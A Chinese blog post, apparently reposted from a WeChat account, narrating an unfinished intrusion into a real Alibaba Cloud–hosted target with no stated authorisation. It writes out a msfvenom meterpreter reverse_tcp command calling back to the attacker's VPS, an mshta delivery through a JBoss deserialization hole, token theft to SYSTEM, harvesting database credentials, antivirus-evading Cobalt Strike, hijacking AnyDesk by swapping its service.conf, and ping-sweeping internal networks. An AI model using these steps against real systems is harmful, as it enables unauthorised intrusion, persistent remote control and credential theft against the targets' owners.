前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >记一次未完成的实战内网渗透

记一次未完成的实战内网渗透

作者头像
潇湘信安
发布2022-09-14 21:52:57
6520
发布2022-09-14 21:52:57
举报
文章被收录于专栏:潇湘信安潇湘信安

这篇文章来自@Sin好友投稿,和我之前写的"记一次从Jboss到3389远程桌面案例"是一个目标,但我只是记录了遇到的问题,他写的更全一些,不过也不完整。

找到一个Jboss反序列化的入口点

图片
图片

然后执行tasklist /svc获取系统的进程,根据进程得知,目标搭建在阿里云上、并且系统中有360主动防御

图片
图片

那么由此可以得知,常见powershell和hta上线是没有希望的,于是想着查看一下C盘文件夹有哪些文件。

但是很可惜可能是C盘文件夹太多的缘故,并不能获取到盘符的文件夹,所以想着通过dir遍历寻找*.jsp\login.jsp这样的文件是没有希望了

图片
图片

那么接下来找到了3h师傅求助,他用了编码加载hta的方式解决了上线的问题,首先执行命令,生成base64的hta,然后复制这个箭头部分的文件

代码语言:javascript
复制
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=VPS地址 lport=端口号 -f raw > /tmp/shellcode1.bin
cat /tmp/shellcode1.bin | base64 -w 0
图片
图片

将这部分的文件复制下来,放到编写的hta文件中,替换hta文件中箭头的双引号部分

图片
图片

然后将hta文件上传到vps,接着利用python自带的命令,开启一个临时web

图片
图片

然后设置msf监听,这里设置x86的版本payload

图片
图片

然后在jboss反序列化工具上进行mshta命令执行,即可上线

图片
图片

进入到目标机器后,由于当前会话是x86,所以需要先进程迁移到64位的进程中

图片
图片

然后着手开始信息搜集,执行ps命令查看系统中运行哪些进程,然后发现系统中执行了一个Gserver进程,然后查看该进程目录中的文件

图片
图片

执行shell命令进入到终端后,使用dir命令查看该路径下的文件,发现该目录中有个xml文件

图片
图片

接着查看xml文件内容,在xml文件中发现,目标的数据库连接信息

图片
图片

于是使用数据库连接工具,连接该文件中的数据库。并激活xp_cmdshell,未进行命令执行

图片
图片

接下来抓取明文信息,首先进行令牌窃取到system权限

图片
图片

不过因为目标机器为阿里云,目前远程登陆的怕引起异地登陆提醒,所以先看一下了路由,目前机器开放了哪些网段

图片
图片

这里本来想用以下命令来扫描内网网段的,但是发现执行这条命令会导致msf的shell端卡死,数据库连接工具执行该命令也会卡死,索性就不在shell上执行该命令了

代码语言:javascript
复制
for /l %i in (1,1,255) do @ ping 10.x.x.%i -w 1 -n 1|find /i "ttl="

于是想起了3h师傅说做好信息搜集,于是我想到去看一下桌面文件,在桌面文件上看到的文件是简体中文文件,在shell端中查看不了该类命名文件

图片
图片

于是还是决定上线一个cs在做后续,因为CS可以下载桌面文件,这里肯定会有人问我为啥不远程连接3389,我这里先说一下连接3389,我这里连接不上,因为可能是阿里云做了限制不允许外联,只能从别的地方下手了。

将cs做了免杀(环境存在360),使用msf上传过去,然后在shell端执行,即可上线

图片
图片
图片
图片

那么目前可以想到的就是继续做信息搜集,或者横向移动,这里决定先做信息搜集,先将桌面文件下载下来,但是这里下载后发现文件并打不开,不知道这里的lnk文件怎么变成了bat文件

图片
图片

思考万千,还是想从远程连接入手,于是利用cs上传了一个向日葵上去,然后执行截屏命令,但是出现了一个很尴尬的事情,程序崩溃了

图片
图片

然后问了下3h师傅,他发了以前的文章给我,(呜呜呜吃了偷懒和没复现的亏),具体是这样的,首先在cs中将anydesk远控软件上传上去

图片
图片

然后运行anydesk文件,然后在以下目录中可以找到连接文件service.conf。这里首先在我们本地anydesk中,设置一个自主访问密码

代码语言:javascript
复制
C:\Users\Administrator\AppData\Roaming\AnyDesk
图片
图片

然后在CS中删除目标机器上的service.conf文件

图片
图片

然后将本地的service.conf上传上去

图片
图片

然后taskkill /f /im anydes.exe 结束掉目标机器上的进程

图片
图片

结束掉进程后,再重新运行,即可用我们本地设置的anydesk进行连接

注意事项:这里引用3h师傅的文章,打字太累了,偷懒一下

图片
图片

最后就成功连接上了

图片
图片

然后通过域控查找的命令,可以看到当前机器不在域中,那么就要想办法先进入到一台域机器中

图片
图片

这里使用3h师傅之前给命令探测内网存活主机,用cs这些工具扫不出来的时候,就可以考虑使用这个

代码语言:javascript
复制
for /l %i in (1,1,255) do @ ping 192.168.2.%i -w 1 -n 1|find /i "ttl="  
图片
图片

还可以,除去本机IP扫出两台存活机器,但是检测后发现目标两台机器都访问不了3389端口,不知道是该了端口还是咋的,只能去扫描这些机器下的存活端口

那么先添加条10网段的路由

图片
图片

扫描出45地址IP端口,这个地址端口可以尝试挨个去访问

图片
图片

将这些IP和端口逐个访问过后在10.x.x.145 IP上发现目标开放了WEB,并且是一个xx侠客行网站(牛逼!)

图片
图片

然后发现该系统由discuz3.4x搭建

图片
图片

但是Discuz没有前台getshell漏洞,有也是SSRF,之前复现还失败了。

后来去忙其他的事了,所以这篇文章也没写完!!!

本文参与?腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2022-06-10,如有侵权请联系?cloudcommunity@tencent.com 删除

本文分享自 潇湘信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与?腾讯云自媒体分享计划? ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
http://www.vxiaotou.com